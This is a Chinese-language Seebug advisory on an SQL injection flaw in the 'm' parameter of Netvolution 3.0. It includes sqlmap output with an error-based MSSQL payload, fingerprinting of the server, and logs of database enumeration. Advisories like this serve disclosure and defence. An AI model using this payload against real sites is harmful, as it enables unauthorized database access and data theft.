Netvolution 'm'参数SQL注入漏洞

2014-03-07T00:00:00
ID SSV:61697
Type seebug
Reporter Root
Modified 2014-03-07T00:00:00

Description

Bugtraq ID:65942

Netvolution是一款基于WEB内容管理软件。

Netvolution不正确过滤用户提交的'm'参数数据,允许远程攻击者利用漏洞提交特制的请求,可操作或获取数据库数据。 0 Netvolution 3.0 目前没有详细解决方案提供: http://www.netvolution.net

                                        
                                            
                                                sqlmap output:

Place: Get
Parameter: m
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
    Payload: m=siteModules.evenCalendarAjax' AND
3829=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)... CHAR(115)+CHAR(112)))
AND 'test'='test&pid=33&lang=2&d=

[HH:MM:SS] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.5
back-end DBMS: Microsoft SQL Server 2005

[HH:MM:SS] [INFO] fetching database names
[HH:MM:SS] [INFO] the SQL query used returns 196 entries
[HH:MM:SS] [INFO] retrieved: A......
[HH:MM:SS] [INFO] retrieved: A......
[HH:MM:SS] [INFO] retrieved: A......
...
[HH:MM:SS] [INFO] fetching tables for databases: A...,A....,A... ...